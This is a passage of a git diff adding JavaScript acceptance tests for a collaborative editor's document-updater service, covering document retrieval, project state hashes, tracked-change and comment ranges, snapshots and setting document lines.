+ describe('when the ops are loaded', function () { + before(function (done) { + return DocUpdaterClient.getDocAndRecentOps( + this.project_id, + this.doc_id, + 190, + (error, res, returnedDoc) => { + if (error) return done(error) + this.returnedDoc = returnedDoc + return done() + } + ) + }) + + return it('should return the recent ops', function () { + this.returnedDoc.ops.length.should.equal(10) + return Array.from(this.updates.slice(190, -1)).map((update, i) => + this.returnedDoc.ops[i].op.should.deep.equal(update.op) + ) + }) + }) + + return describe('when the ops are not all loaded', function () { + before(function (done) { + // We only track 100 ops + return DocUpdaterClient.getDocAndRecentOps( + this.project_id, + this.doc_id, + 10, + (error, res, returnedDoc) => { + if (error) return done(error) + this.res = res + this.returnedDoc = returnedDoc + return done() + } + ) + }) + + return it('should return UnprocessableEntity', function () { + return this.res.statusCode.should.equal(422) + }) + }) + }) + + describe('when the document does not exist', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + this.statusCode = res.statusCode + return done() + } + ) + }) + + return it('should return 404', function () { + return this.statusCode.should.equal(404) + }) + }) + + describe('when the web api returns an error', function () { + before(function (done) { + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + sinon + .stub(MockWebApi, 'getDocument') + .callsFake((projectId, docId, callback) => { + if (callback == null) { + callback = function () {} + } + return callback(new Error('oops')) + }) + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + this.statusCode = res.statusCode + return done() + } + ) + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + return it('should return 500', function () { + return this.statusCode.should.equal(500) + }) + }) + + return describe('when the web api http request takes a long time', function () { + before(function (done) { + this.timeout = 10000 + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + sinon + .stub(MockWebApi, 'getDocument') + .callsFake((projectId, docId, callback) => { + if (callback == null) { + callback = function () {} + } + return setTimeout(callback, 30000) + }) + return done() + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + return it('should return quickly(ish)', function (done) { + const start = Date.now() + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, doc) => { + if (error) return done(error) + res.statusCode.should.equal(500) + const delta = Date.now() - start + expect(delta).to.be.below(20000) + return done() + } + ) + }) + }) +}) + +function __range__(left, right, inclusive) { + const range = [] + const ascending = left < right + const end = !inclusive ? right : ascending ? right + 1 : right - 1 + for (let i = left; ascending ? i < end : i > end; ascending ? 
i++ : i--) { + range.push(i) + } + return range +} diff --git a/services/document-updater/test/acceptance/js/GettingProjectDocsTests.js b/services/document-updater/test/acceptance/js/GettingProjectDocsTests.js new file mode 100644 index 0000000..07bdd85 --- /dev/null +++ b/services/document-updater/test/acceptance/js/GettingProjectDocsTests.js @@ -0,0 +1,176 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const sinon = require('sinon') +const { expect } = require('chai') + +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Getting documents for project', function () { + before(function (done) { + this.lines = ['one', 'two', 'three'] + this.version = 42 + return DocUpdaterApp.ensureRunning(done) + }) + + describe('when project state hash does not match', function () { + before(function (done) { + this.projectStateHash = DocUpdaterClient.randomId() + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + return DocUpdaterClient.preloadDoc( + this.project_id, + this.doc_id, + error => { + if (error != null) { + throw error + } + return DocUpdaterClient.getProjectDocs( + this.project_id, + this.projectStateHash, + (error, res, returnedDocs) => { + if (error) return done(error) + this.res = res + this.returnedDocs = returnedDocs + return done() + } + ) + } + ) + }) + + return it('should return a 409 Conflict response', function () { + return this.res.statusCode.should.equal(409) + }) + }) + + describe('when project state hash matches', function () { + before(function (done) { + this.projectStateHash = DocUpdaterClient.randomId() + ;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + return DocUpdaterClient.preloadDoc( + this.project_id, + this.doc_id, + error => { + if (error != null) { + throw error + } + return DocUpdaterClient.getProjectDocs( + this.project_id, + this.projectStateHash, + (error, res0, returnedDocs0) => { + if (error) return done(error) + // set the hash + this.res0 = res0 + this.returnedDocs0 = returnedDocs0 + return DocUpdaterClient.getProjectDocs( + this.project_id, + this.projectStateHash, + (error, res, returnedDocs) => { + if (error) return done(error) + // the hash should now match + this.res = res + this.returnedDocs = returnedDocs + return done() + } + ) + } + ) + } + ) + }) + + it('should return a 200 response', function () { + return this.res.statusCode.should.equal(200) + }) + + return it('should return the documents', function () { + return this.returnedDocs.should.deep.equal([ + { _id: this.doc_id, lines: this.lines, v: this.version }, + ]) + }) + }) + + return describe('when the doc has been removed', function () { + before(function (done) { + this.projectStateHash = DocUpdaterClient.randomId() + 
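+      // The per-project docs endpoint is guarded by a state hash: a GET with
+      // a hash the doc updater has not seen yet returns 409 Conflict and
+      // records the hash, and a repeat GET with the same hash returns 200
+      // until the project changes again -- here, via the doc deletion below.
+      // A sketch of that handshake, reusing the helper from
+      // ./helpers/DocUpdaterClient:
+      //
+      //   DocUpdaterClient.getProjectDocs(projectId, hash, (err, res) => {
+      //     // first call: expect res.statusCode === 409
+      //     DocUpdaterClient.getProjectDocs(projectId, hash, (err2, res2) => {
+      //       // second call: expect res2.statusCode === 200
+      //     })
+      //   })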
;[this.project_id, this.doc_id] = Array.from([ + DocUpdaterClient.randomId(), + DocUpdaterClient.randomId(), + ]) + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + return DocUpdaterClient.preloadDoc( + this.project_id, + this.doc_id, + error => { + if (error != null) { + throw error + } + return DocUpdaterClient.getProjectDocs( + this.project_id, + this.projectStateHash, + (error, res0, returnedDocs0) => { + if (error) return done(error) + // set the hash + this.res0 = res0 + this.returnedDocs0 = returnedDocs0 + return DocUpdaterClient.deleteDoc( + this.project_id, + this.doc_id, + (error, res, body) => { + if (error) return done(error) + // delete the doc + return DocUpdaterClient.getProjectDocs( + this.project_id, + this.projectStateHash, + (error, res1, returnedDocs) => { + if (error) return done(error) + // the hash would match, but the doc has been deleted + this.res = res1 + this.returnedDocs = returnedDocs + return done() + } + ) + } + ) + } + ) + } + ) + }) + + return it('should return a 409 Conflict response', function () { + return this.res.statusCode.should.equal(409) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/PeekingADoc.js b/services/document-updater/test/acceptance/js/PeekingADoc.js new file mode 100644 index 0000000..94ce16e --- /dev/null +++ b/services/document-updater/test/acceptance/js/PeekingADoc.js @@ -0,0 +1,100 @@ +const sinon = require('sinon') +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Peeking a document', function () { + before(function (done) { + this.lines = ['one', 'two', 'three'] + this.version = 42 + return DocUpdaterApp.ensureRunning(done) + }) + + describe('when the document is not loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + sinon.spy(MockWebApi, 'getDocument') + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + + return DocUpdaterClient.peekDoc( + this.project_id, + this.doc_id, + (error, res, returnedDoc) => { + this.error = error + this.res = res + this.returnedDoc = returnedDoc + return done() + } + ) + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + it('should return a 404 response', function () { + this.res.statusCode.should.equal(404) + }) + + it('should not load the document from the web API', function () { + return MockWebApi.getDocument.called.should.equal(false) + }) + }) + + describe('when the document is already loaded', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + return DocUpdaterClient.preloadDoc( + this.project_id, + this.doc_id, + error => { + if (error != null) { + throw error + } + sinon.spy(MockWebApi, 'getDocument') + return DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, returnedDoc) => { + if (error) return done(error) + this.res = res + this.returnedDoc = returnedDoc + return done() + } + ) + } + ) + }) + + after(function () { + return MockWebApi.getDocument.restore() + }) + + it('should return a 200 response', function () { + this.res.statusCode.should.equal(200) + }) + + it('should return the 
document lines', function () { + return this.returnedDoc.lines.should.deep.equal(this.lines) + }) + + it('should return the document version', function () { + return this.returnedDoc.version.should.equal(this.version) + }) + + it('should not load the document from the web API', function () { + return MockWebApi.getDocument.called.should.equal(false) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/RangesTests.js b/services/document-updater/test/acceptance/js/RangesTests.js new file mode 100644 index 0000000..424ea7e --- /dev/null +++ b/services/document-updater/test/acceptance/js/RangesTests.js @@ -0,0 +1,882 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const async = require('async') + +const { db, ObjectId } = require('../../../app/js/mongodb') +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') +const RangesManager = require('../../../app/js/RangesManager') + +const sandbox = sinon.createSandbox() + +describe('Ranges', function () { + before(function (done) { + DocUpdaterApp.ensureRunning(done) + }) + + describe('tracking changes from ops', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.id_seed = '587357bd35e64f6157' + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['aaa'], + } + this.updates = [ + { + doc: this.doc.id, + op: [{ i: '123', p: 1 }], + v: 0, + meta: { user_id: this.user_id }, + }, + { + doc: this.doc.id, + op: [{ i: '456', p: 5 }], + v: 1, + meta: { user_id: this.user_id, tc: this.id_seed }, + }, + { + doc: this.doc.id, + op: [{ d: '12', p: 1 }], + v: 2, + meta: { user_id: this.user_id }, + }, + ] + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + }) + const jobs = [] + for (const update of this.updates) { + jobs.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + update, + callback + ) + ) + } + + DocUpdaterApp.ensureRunning(error => { + if (error != null) { + throw error + } + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + async.series(jobs, error => { + if (error != null) { + throw error + } + done() + }) + }) + }) + }) + + it('should update the ranges', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + const change = ranges.changes[0] + change.op.should.deep.equal({ i: '456', p: 3 }) + change.id.should.equal(this.id_seed + '000001') + change.metadata.user_id.should.equal(this.user_id) + done() + } + ) + }) + + describe('Adding comments', function () { + describe('standalone', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['foo bar baz'], + } + this.updates = [ + { + doc: this.doc.id, + op: [ + { c: 'bar', p: 4, t: (this.tid = DocUpdaterClient.randomId()) }, + ], + v: 0, + }, + ] + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + }) + const jobs = [] + for (const update of this.updates) { + jobs.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + update, + callback + ) + ) + } + 
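+          // Comment ops have the shape { c: <quoted text>, p: <position>,
+          // t: <thread id> } and land in ranges.comments rather than
+          // ranges.changes, as the assertion below checks. A minimal sketch
+          // of sending one by hand (ids hypothetical):
+          //
+          //   const tid = DocUpdaterClient.randomId()
+          //   DocUpdaterClient.sendUpdate(projectId, docId, {
+          //     doc: docId,
+          //     op: [{ c: 'bar', p: 4, t: tid }],
+          //     v: 0,
+          //   }, callback)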
DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + async.series(jobs, error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + }) + }) + }) + + it('should update the ranges', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + const comment = ranges.comments[0] + comment.op.should.deep.equal({ c: 'bar', p: 4, t: this.tid }) + comment.id.should.equal(this.tid) + done() + } + ) + }) + }) + + describe('with conflicting ops needing OT', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['foo bar baz'], + } + this.updates = [ + { + doc: this.doc.id, + op: [{ i: 'ABC', p: 3 }], + v: 0, + meta: { user_id: this.user_id }, + }, + { + doc: this.doc.id, + op: [ + { c: 'bar', p: 4, t: (this.tid = DocUpdaterClient.randomId()) }, + ], + v: 0, + }, + ] + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + }) + const jobs = [] + for (const update of this.updates) { + jobs.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + update, + callback + ) + ) + } + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + async.series(jobs, error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + }) + }) + }) + + it('should update the comments with the OT shifted comment', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + const comment = ranges.comments[0] + comment.op.should.deep.equal({ c: 'bar', p: 7, t: this.tid }) + done() + } + ) + }) + }) + }) + }) + + describe('Loading ranges from persistence layer', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.id_seed = '587357bd35e64f6157' + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['a123aa'], + } + this.update = { + doc: this.doc.id, + op: [{ i: '456', p: 5 }], + v: 0, + meta: { user_id: this.user_id, tc: this.id_seed }, + } + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + ranges: { + changes: [ + { + op: { i: '123', p: 1 }, + metadata: { + user_id: this.user_id, + ts: new Date(), + }, + }, + ], + }, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + } + ) + }) + }) + + it('should have preloaded the existing ranges', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { changes } = data.ranges + changes[0].op.should.deep.equal({ i: '123', p: 1 }) + changes[1].op.should.deep.equal({ i: '456', p: 5 }) + done() + } + ) + }) + + it('should flush the ranges to the persistence layer again', function (done) { + DocUpdaterClient.flushDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + MockWebApi.getDocument(this.project_id, this.doc.id, (error, doc) => { + 
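+          // After flushDoc, the doc updater has written the doc back through
+          // the web API, so this direct (non-HTTP) call to
+          // MockWebApi.getDocument should see both the preloaded range and
+          // the one applied by the update in this test.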
if (error) return done(error) + const { changes } = doc.ranges + changes[0].op.should.deep.equal({ i: '123', p: 1 }) + changes[1].op.should.deep.equal({ i: '456', p: 5 }) + done() + }) + }) + }) + }) + + describe('accepting a change', function () { + beforeEach(function (done) { + sandbox.spy(MockWebApi, 'setDocument') + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.id_seed = '587357bd35e64f6157' + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['aaa'], + } + this.update = { + doc: this.doc.id, + op: [{ i: '456', p: 1 }], + v: 0, + meta: { user_id: this.user_id, tc: this.id_seed }, + } + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + const change = ranges.changes[0] + change.op.should.deep.equal({ i: '456', p: 1 }) + change.id.should.equal(this.id_seed + '000001') + change.metadata.user_id.should.equal(this.user_id) + done() + } + ) + }, 200) + } + ) + }) + }) + afterEach(function () { + sandbox.restore() + }) + + it('should remove the change after accepting', function (done) { + DocUpdaterClient.acceptChange( + this.project_id, + this.doc.id, + this.id_seed + '000001', + error => { + if (error != null) { + throw error + } + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + expect(data.ranges.changes).to.be.undefined + done() + } + ) + } + ) + }) + + it('should persist the ranges after accepting', function (done) { + DocUpdaterClient.flushDoc(this.project_id, this.doc.id, err => { + if (err) return done(err) + DocUpdaterClient.acceptChange( + this.project_id, + this.doc.id, + this.id_seed + '000001', + error => { + if (error != null) { + throw error + } + + DocUpdaterClient.flushDoc(this.project_id, this.doc.id, err => { + if (err) return done(err) + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + expect(data.ranges.changes).to.be.undefined + + MockWebApi.setDocument + .calledWith(this.project_id, this.doc.id, ['a456aa'], 1, {}) + .should.equal(true) + done() + } + ) + }) + } + ) + }) + }) + }) + + describe('accepting multiple changes', function () { + beforeEach(function (done) { + this.getHistoryUpdatesSpy = sandbox.spy( + RangesManager, + 'getHistoryUpdatesForAcceptedChanges' + ) + + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['aaa', 'bbb', 'ccc', 'ddd', 'eee'], + } + + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + historyRangesSupport: true, + }) + + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + + this.id_seed_1 = 'tc_1' + this.id_seed_2 = 'tc_2' + this.id_seed_3 = 'tc_3' + + this.updates = [ + { + doc: this.doc.id, + op: [{ d: 'bbb', p: 4 }], + v: 0, + meta: { + user_id: this.user_id, + tc: this.id_seed_1, + }, + }, + { + doc: this.doc.id, + op: [{ d: 'ccc', p: 5 }], + v: 1, + meta: { + 
user_id: this.user_id, + tc: this.id_seed_2, + }, + }, + { + doc: this.doc.id, + op: [{ d: 'ddd', p: 6 }], + v: 2, + meta: { + user_id: this.user_id, + tc: this.id_seed_3, + }, + }, + ] + + DocUpdaterClient.sendUpdates( + this.project_id, + this.doc.id, + this.updates, + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + const changeOps = ranges.changes + .map(change => change.op) + .flat() + changeOps.should.deep.equal([ + { d: 'bbb', p: 4 }, + { d: 'ccc', p: 5 }, + { d: 'ddd', p: 6 }, + ]) + done() + } + ) + }, 200) + } + ) + }) + }) + + afterEach(function () { + sandbox.restore() + }) + + it('accepting changes in order', function (done) { + DocUpdaterClient.acceptChanges( + this.project_id, + this.doc.id, + [ + this.id_seed_1 + '000001', + this.id_seed_2 + '000001', + this.id_seed_3 + '000001', + ], + error => { + if (error != null) { + throw error + } + + const historyUpdates = this.getHistoryUpdatesSpy.returnValues[0] + expect(historyUpdates[0]).to.deep.equal({ + doc: this.doc.id, + meta: { + pathname: '/a/b/c.tex', + doc_length: 10, + history_doc_length: 19, + ts: historyUpdates[0].meta.ts, + user_id: this.user_id, + }, + op: [{ p: 4, d: 'bbb' }], + }) + + expect(historyUpdates[1]).to.deep.equal({ + doc: this.doc.id, + meta: { + pathname: '/a/b/c.tex', + doc_length: 10, + history_doc_length: 16, + ts: historyUpdates[1].meta.ts, + user_id: this.user_id, + }, + op: [{ p: 5, d: 'ccc' }], + }) + + expect(historyUpdates[2]).to.deep.equal({ + doc: this.doc.id, + meta: { + pathname: '/a/b/c.tex', + doc_length: 10, + history_doc_length: 13, + ts: historyUpdates[2].meta.ts, + user_id: this.user_id, + }, + op: [{ p: 6, d: 'ddd' }], + }) + + done() + } + ) + }) + + it('accepting changes in reverse order', function (done) { + DocUpdaterClient.acceptChanges( + this.project_id, + this.doc.id, + [ + this.id_seed_3 + '000001', + this.id_seed_2 + '000001', + this.id_seed_1 + '000001', + ], + error => { + if (error != null) { + throw error + } + + const historyUpdates = this.getHistoryUpdatesSpy.returnValues[0] + expect(historyUpdates[0]).to.deep.equal({ + doc: this.doc.id, + meta: { + pathname: '/a/b/c.tex', + doc_length: 10, + history_doc_length: 19, + ts: historyUpdates[0].meta.ts, + user_id: this.user_id, + }, + op: [{ p: 4, d: 'bbb' }], + }) + + expect(historyUpdates[1]).to.deep.equal({ + doc: this.doc.id, + meta: { + pathname: '/a/b/c.tex', + doc_length: 10, + history_doc_length: 16, + ts: historyUpdates[1].meta.ts, + user_id: this.user_id, + }, + op: [{ p: 5, d: 'ccc' }], + }) + + expect(historyUpdates[2]).to.deep.equal({ + doc: this.doc.id, + meta: { + pathname: '/a/b/c.tex', + doc_length: 10, + history_doc_length: 13, + ts: historyUpdates[2].meta.ts, + user_id: this.user_id, + }, + op: [{ p: 6, d: 'ddd' }], + }) + + done() + } + ) + }) + }) + + describe('deleting a comment range', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['foo bar'], + } + this.update = { + doc: this.doc.id, + op: [{ c: 'bar', p: 4, t: (this.tid = DocUpdaterClient.randomId()) }], + v: 0, + } + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + 
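+        // Removing a comment goes through
+        // DELETE /project/:project_id/doc/:doc_id/comment/:comment_id
+        // (DocUpdaterClient.removeComment) and replies 204 No Content;
+        // afterwards ranges.comments is expected to be absent entirely
+        // rather than an empty array, as the test below asserts.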
DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + this.update, + error => { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + const change = ranges.comments[0] + change.op.should.deep.equal({ c: 'bar', p: 4, t: this.tid }) + change.id.should.equal(this.tid) + done() + } + ) + }, 200) + } + ) + }) + }) + + it('should remove the comment range', function (done) { + DocUpdaterClient.removeComment( + this.project_id, + this.doc.id, + this.tid, + (error, res) => { + if (error != null) { + throw error + } + expect(res.statusCode).to.equal(204) + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + expect(data.ranges.comments).to.be.undefined + done() + } + ) + } + ) + }) + }) + + describe('tripping range size limit', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.id_seed = DocUpdaterClient.randomId() + this.doc = { + id: DocUpdaterClient.randomId(), + lines: ['aaa'], + } + this.i = new Array(3 * 1024 * 1024).join('a') + this.updates = [ + { + doc: this.doc.id, + op: [{ i: this.i, p: 1 }], + v: 0, + meta: { user_id: this.user_id, tc: this.id_seed }, + }, + ] + MockWebApi.insertDoc(this.project_id, this.doc.id, { + lines: this.doc.lines, + version: 0, + }) + const jobs = [] + for (const update of this.updates) { + jobs.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc.id, + update, + callback + ) + ) + } + DocUpdaterClient.preloadDoc(this.project_id, this.doc.id, error => { + if (error != null) { + throw error + } + async.series(jobs, error => { + if (error != null) { + throw error + } + setTimeout(done, 200) + }) + }) + }) + + it('should not update the ranges', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc.id, + (error, res, data) => { + if (error != null) { + throw error + } + const { ranges } = data + expect(ranges.changes).to.be.undefined + done() + } + ) + }) + }) + + describe('deleting text surrounding a comment', function () { + before(function (done) { + this.project_id = DocUpdaterClient.randomId() + this.user_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: ['foo bar baz'], + version: 0, + ranges: { + comments: [ + { + op: { + c: 'a', + p: 5, + tid: (this.tid = DocUpdaterClient.randomId()), + }, + metadata: { + user_id: this.user_id, + ts: new Date(), + }, + }, + ], + }, + }) + this.updates = [ + { + doc: this.doc_id, + op: [{ d: 'foo ', p: 0 }], + v: 0, + meta: { user_id: this.user_id }, + }, + { + doc: this.doc_id, + op: [{ d: 'bar ', p: 0 }], + v: 1, + meta: { user_id: this.user_id }, + }, + ] + const jobs = [] + for (const update of this.updates) { + jobs.push(callback => + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + update, + callback + ) + ) + } + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error != null) { + throw error + } + async.series(jobs, function (error) { + if (error != null) { + throw error + } + setTimeout(() => { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, data) => { + if (error != null) { + throw error + } + done() + } + ) + }, 200) + }) + }) + }) + + it('should write a snapshot from before the 
destructive change', function (done) { + DocUpdaterClient.getDoc( + this.project_id, + this.doc_id, + (error, res, data) => { + if (error != null) { + return done(error) + } + db.docSnapshots + .find({ + project_id: new ObjectId(this.project_id), + doc_id: new ObjectId(this.doc_id), + }) + .toArray((error, docSnapshots) => { + if (error != null) { + return done(error) + } + expect(docSnapshots.length).to.equal(1) + expect(docSnapshots[0].version).to.equal(1) + expect(docSnapshots[0].lines).to.deep.equal(['bar baz']) + expect(docSnapshots[0].ranges.comments[0].op).to.deep.equal({ + c: 'a', + p: 1, + tid: this.tid, + }) + done() + }) + } + ) + }) + }) +}) diff --git a/services/document-updater/test/acceptance/js/SettingADocumentTests.js b/services/document-updater/test/acceptance/js/SettingADocumentTests.js new file mode 100644 index 0000000..5b0c4ab --- /dev/null +++ b/services/document-updater/test/acceptance/js/SettingADocumentTests.js @@ -0,0 +1,528 @@ +const sinon = require('sinon') +const { expect } = require('chai') +const Settings = require('@overleaf/settings') +const docUpdaterRedis = require('@overleaf/redis-wrapper').createClient( + Settings.redis.documentupdater +) +const Keys = Settings.redis.documentupdater.key_schema + +const MockProjectHistoryApi = require('./helpers/MockProjectHistoryApi') +const MockWebApi = require('./helpers/MockWebApi') +const DocUpdaterClient = require('./helpers/DocUpdaterClient') +const DocUpdaterApp = require('./helpers/DocUpdaterApp') + +describe('Setting a document', function () { + let numberOfReceivedUpdates = 0 + before(function (done) { + DocUpdaterClient.subscribeToAppliedOps(() => { + numberOfReceivedUpdates++ + }) + this.lines = ['one', 'two', 'three'] + this.version = 42 + this.update = { + doc: this.doc_id, + op: [ + { + i: 'one and a half\n', + p: 4, + }, + ], + v: this.version, + } + this.result = ['one', 'one and a half', 'two', 'three'] + this.newLines = ['these', 'are', 'the', 'new', 'lines'] + this.source = 'dropbox' + this.user_id = 'user-id-123' + + sinon.spy(MockProjectHistoryApi, 'flushProject') + sinon.spy(MockWebApi, 'setDocument') + DocUpdaterApp.ensureRunning(done) + }) + + after(function () { + MockProjectHistoryApi.flushProject.restore() + MockWebApi.setDocument.restore() + }) + + describe('when the updated doc exists in the doc updater', function () { + before(function (done) { + numberOfReceivedUpdates = 0 + this.project_id = DocUpdaterClient.randomId() + this.doc_id = DocUpdaterClient.randomId() + MockWebApi.insertDoc(this.project_id, this.doc_id, { + lines: this.lines, + version: this.version, + }) + DocUpdaterClient.preloadDoc(this.project_id, this.doc_id, error => { + if (error) { + throw error + } + DocUpdaterClient.sendUpdate( + this.project_id, + this.doc_id, + this.update, + error => { + if (error) { + throw error + } + setTimeout(() => { + DocUpdaterClient.setDocLines( + this.project_id, + this.doc_id, + this.newLines, + this.source, + this.user_id, + false, + (error, res, body) => { + if (error) { + return done(error) + } + this.statusCode = res.statusCode + this.body = body + done() + } + ) + }, 200) + } + ) + }) + }) + + after(function () { + MockProjectHistoryApi.flushProject.resetHistory() + MockWebApi.setDocument.resetHistory() + }) + + it('should return a 200 status code', function () { + this.statusCode.should.equal(200) + }) + + it('should emit two updates (from sendUpdate and setDocLines)', function () { + expect(numberOfReceivedUpdates).to.equal(2) + }) + + it('should send the updated doc lines and 
